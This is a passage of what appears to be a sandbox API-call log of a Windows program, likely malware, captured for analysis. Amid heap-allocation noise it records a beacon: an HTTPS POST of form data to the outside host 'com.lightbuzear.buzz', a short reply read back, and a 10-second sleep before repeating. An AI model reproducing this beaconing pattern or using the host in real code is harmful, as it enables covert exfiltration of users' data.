0x47ce6b0 [0173.931] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0173.931] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0173.931] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0173.931] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0980 [0173.931] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0173.931] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0aa0 [0173.931] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0980 | out: hHeap=0x4780000) returned 1 [0173.931] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0173.931] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0aa0 | out: hHeap=0x4780000) returned 1 [0173.931] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f08d8 [0173.931] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f678 [0173.932] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f678 | out: hHeap=0x4780000) returned 1 [0173.932] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0173.932] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f5b0 [0173.932] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0173.943] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce640 [0173.943] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0173.943] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0173.943] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0173.943] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0173.943] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0173.943] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0173.943] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0173.944] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0173.944] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0a58 [0173.944] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0173.944] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0818 [0173.944] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0a58 | out: hHeap=0x4780000) returned 1 [0173.944] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0173.944] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0818 | out: hHeap=0x4780000) returned 1 [0173.944] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f678 [0173.944] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0173.944] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd30 [0173.944] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f678 | out: hHeap=0x4780000) returned 1 [0173.944] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f678 [0173.944] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0173.944] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f6a0 [0173.945] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0173.945] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0173.946] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0173.946] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0173.946] FreeLibrary (hLibModule=0x71780000) returned 1 [0173.946] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f6a0 | out: hHeap=0x4780000) returned 1 [0173.946] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0173.946] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f6a0 [0173.947] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0173.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6f0 [0173.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0173.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0173.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0173.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0173.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6f0 [0173.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0173.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6a0 [0173.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0173.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0ae8 [0173.971] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0173.971] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0818 [0173.972] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0ae8 | out: hHeap=0x4780000) returned 1 [0173.972] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0173.972] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0818 | out: hHeap=0x4780000) returned 1 [0173.972] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f0938 [0173.972] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f6c8 [0173.972] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f6c8 | out: hHeap=0x4780000) returned 1 [0173.972] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0173.972] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f6c8 [0173.972] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0173.972] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f6f0 [0173.972] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0173.972] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0173.972] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0173.973] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0173.973] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0173.973] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5c0 [0173.973] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0173.973] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0173.973] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0173.973] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0818 [0173.973] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0173.973] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0980 [0173.973] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0818 | out: hHeap=0x4780000) returned 1 [0173.973] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0173.973] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0980 | out: hHeap=0x4780000) returned 1 [0173.973] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f0818 [0173.973] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f768 [0173.973] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f768 | out: hHeap=0x4780000) returned 1 [0173.973] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0173.973] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0173.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce610 [0173.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0173.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0173.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0173.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0173.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0173.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0173.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6a0 [0173.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0173.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0980 [0173.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0173.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0830 [0173.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0980 | out: hHeap=0x4780000) returned 1 [0173.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0173.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0830 | out: hHeap=0x4780000) returned 1 [0173.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f768 [0173.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0173.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd30 [0173.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f768 | out: hHeap=0x4780000) returned 1 [0173.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f768 [0173.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0173.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f0b0 [0173.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0173.975] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0173.975] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0173.975] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0173.975] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f0b0 | out: hHeap=0x4780000) returned 1 [0173.975] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5b0 [0173.975] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5c0 [0173.975] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0173.975] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0173.975] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0173.975] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0173.975] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0173.975] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0173.975] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0173.975] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0980 [0173.975] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0173.975] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f09b0 [0173.976] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0980 | out: hHeap=0x4780000) returned 1 [0173.976] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0173.976] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f09b0 | out: hHeap=0x4780000) returned 1 [0173.976] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f290 [0173.976] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0173.976] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0173.976] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f290 | out: hHeap=0x4780000) returned 1 [0173.976] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f1f0 [0173.976] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0173.976] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f4c0 [0173.976] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0173.976] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0173.976] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0173.976] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0176.296] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f4c0 | out: hHeap=0x4780000) returned 1 [0176.296] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0176.297] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0176.297] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0176.297] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0176.297] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0176.297] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0176.297] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0176.297] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0176.297] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0176.297] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0176.297] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0176.297] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0176.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f09b0 [0176.298] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0176.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0830 [0176.298] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f09b0 | out: hHeap=0x4780000) returned 1 [0176.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0176.298] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0830 | out: hHeap=0x4780000) returned 1 [0176.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f3d0 [0176.298] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0176.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb978 [0176.298] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f3d0 | out: hHeap=0x4780000) returned 1 [0176.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f088 [0176.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0176.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f038 [0176.298] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0176.299] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0176.299] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0176.299] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0176.299] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f038 | out: hHeap=0x4780000) returned 1 [0176.300] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0176.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0176.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0176.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0176.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0176.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0176.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0176.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0176.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5f0 [0176.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0176.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0830 [0176.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0176.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0908 [0176.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0830 | out: hHeap=0x4780000) returned 1 [0176.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0176.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0908 | out: hHeap=0x4780000) returned 1 [0176.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f0d8 [0176.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0176.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd68 [0176.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f0d8 | out: hHeap=0x4780000) returned 1 [0176.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f4c0 [0176.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0176.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f128 [0176.301] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0176.301] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0176.301] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0176.301] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0176.301] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f128 | out: hHeap=0x4780000) returned 1 [0176.302] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0176.302] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0176.302] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0176.302] FreeLibrary (hLibModule=0x71570000) returned 1 [0176.302] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0176.302] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0176.302] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f6f0 | out: hHeap=0x4780000) returned 1 [0176.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f6c8 | out: hHeap=0x4780000) returned 1 [0176.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f6a0 | out: hHeap=0x4780000) returned 1 [0176.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f5b0 | out: hHeap=0x4780000) returned 1 [0176.303] Sleep (dwMilliseconds=0x2710) [0176.318] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0176.318] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0176.318] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0176.318] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0176.318] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0176.318] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0176.318] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0176.318] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce750 [0176.318] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0176.318] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0aa0 [0176.318] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0176.318] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0830 [0176.318] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0aa0 | out: hHeap=0x4780000) returned 1 [0176.318] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0176.318] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0830 | out: hHeap=0x4780000) returned 1 [0176.318] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f0998 [0176.318] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f6a0 [0176.319] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f6a0 | out: hHeap=0x4780000) returned 1 [0176.319] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0176.319] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f5b0 [0176.319] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0176.319] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0176.319] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0176.319] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0176.319] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0176.319] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0176.319] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0176.319] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0176.319] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0176.320] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0176.320] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f09b0 [0176.320] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, 